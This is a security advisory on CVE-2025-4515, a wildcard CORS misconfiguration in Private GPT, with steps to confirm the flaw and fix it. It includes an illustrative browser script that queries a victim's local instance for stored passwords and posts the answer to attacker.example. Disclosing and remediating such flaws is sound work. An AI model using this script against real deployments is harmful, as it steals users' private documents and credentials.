Private GPT is a production-ready AI solution that enables secure, private queries over documents using Large Language Models (LLMs). Designed for privacy, it can operate without an Internet connection, ensuring no data leaves the execution environment.
However, Private GPT's CORS settings are insecurely configured, allowing any origin to interact with the application without restriction. This flaw exposes sensitive user data whenever a victim visits an attacker-controlled website. By exploiting the CORS misconfiguration, an attacker bypasses the intended isolation of Private GPT and can fully interact with it. Even when the instance is deployed on an internal network, an attacker can chat with it and extract sensitive information such as credentials, private documents, or any other content from previously uploaded materials.
- Status: Assigned
- CVE: CVE-2025-4515
- Code Base: Versions up to and including 2025.04.23
- Released Versions: Versions up to and including v0.6.2
Private GPT's CORS settings are overly permissive, configured with a wildcard (*) for trusted origins. This allows any origin to interact with the service without being blocked by the same-origin policy.
Attackers can exploit this by deploying malicious JavaScript that interacts with Private GPT’s API to extract sensitive user data. Even when deployed on an internal network, this vulnerability enables unauthorized data access through crafted requests.
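As a rough illustration of how little is required, a snippet like the following could run on any web page the victim opens. The deployment URL and the /v1/ingest/list path are assumptions about a default local installation, not details taken from the advisory:

```js
// Runs in the victim's browser from an arbitrary origin. Because Private GPT
// reflects any Origin in its CORS response headers, the browser lets this page
// read the response instead of blocking it under the same-origin policy.
fetch("http://127.0.0.1:8001/v1/ingest/list")
  .then((res) => res.json())
  .then((docs) => console.log("Documents ingested by the victim:", docs));
```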
By modifying the Origin request header, an attacker can confirm the misconfiguration. The response headers indicate the application's trust in any origin:
```
access-control-allow-credentials: true
access-control-allow-origin: http://ANY
```
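A minimal Node.js sketch of this check (the target port and the /health path are assumptions about a typical local deployment):

```js
// Send a request with an arbitrary Origin header and print the CORS response
// headers; a misconfigured instance reflects the supplied origin and allows
// credentials.
const http = require("http");

const req = http.request(
  {
    host: "127.0.0.1",
    port: 8001,
    path: "/health", // assumed endpoint; any route behind the CORS middleware works
    headers: { Origin: "http://attacker.example" },
  },
  (res) => {
    console.log(res.headers["access-control-allow-origin"]);      // echoes http://attacker.example
    console.log(res.headers["access-control-allow-credentials"]); // "true"
    res.resume();
  }
);
req.end();
```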
The root issue lies in the settings.yaml file, where CORS is improperly configured to whitelist all origins:

```yaml
cors:
  enabled: true
  allow_origins: ["*"]
  allow_methods: ["*"]
  allow_headers: ["*"]
```

A typical attack unfolds as follows:

- A victim uploads sensitive documents, including credentials, to Private GPT.
- An attacker hosts malicious code and tricks the victim into interacting with it (e.g., by clicking a link).
- The malicious code exploits the CORS misconfiguration to interact with Private GPT’s API, exfiltrating sensitive data such as passwords.
A proof-of-concept demonstration is available here: https://gist.github.com/superboy-zjc/f29fd02a586dc8bbe52bb95153731ad1
The demo shows unauthorized access to a Private GPT instance deployed at http://127.0.0.1:8001. In a real-world attack, the data would be silently exfiltrated to an attacker-controlled server, making the activity inconspicuous.
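The gist above is the authoritative PoC; purely as an illustration of the pattern, a malicious page might look roughly like this (the chat endpoint, request fields, and attacker URL are assumptions, not taken from the PoC):

```js
// Illustrative only: query the victim's local Private GPT instance for
// sensitive content and silently forward the answer to an attacker server.
async function exfiltrate() {
  // Ask the model to answer from the victim's previously ingested documents.
  const res = await fetch("http://127.0.0.1:8001/v1/chat/completions", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      messages: [
        { role: "user", content: "List any passwords or credentials found in the uploaded documents." },
      ],
      use_context: true, // assumed flag for retrieval over ingested documents
      stream: false,
    }),
  });
  const answer = await res.json();

  // Exfiltrate to a server the attacker controls; the victim sees nothing.
  await fetch("https://attacker.example/collect", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(answer),
  });
}

exfiltrate();
```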
(Malicious website interacting with Private GPT)
(Sensitive information can be extracted)
- Sensitive data exposure: Private GPT can inadvertently leak sensitive user-uploaded documents or credentials.
- Increased attack surface: Even when deployed in an isolated environment, the vulnerability allows unauthorized access.
- Trust erosion: Users rely on Private GPT for privacy and security; such vulnerabilities undermine this trust.
- Restrict Trusted Origins: Replace the wildcard origin (`*`) in settings.yaml with a strict list of trusted domains, such as the following (a quick browser-side re-test is sketched after this list):

  ```yaml
  cors:
    enabled: true
    allow_origins:
      - "http://localhost:8000"
      - "https://your-domain.com"
  ```
- Secure Deployment Practices: Deploy Private GPT in environments with strict network segmentation and access controls to minimize attack exposure.
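Once the origin allow-list is in place, the earlier cross-origin read should fail: the browser withholds the response because the server no longer emits a matching Access-Control-Allow-Origin header. A minimal re-test, under the same assumptions about the deployment URL and API path as the sketches above:

```js
// Run from a page on an origin that is NOT in the allow-list. With CORS fixed,
// the browser blocks the cross-origin read and fetch() rejects with a TypeError.
fetch("http://127.0.0.1:8001/v1/ingest/list")
  .then(() => console.log("Response still readable - CORS policy not applied"))
  .catch((err) => console.log("Blocked by CORS as expected:", err.message));
```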


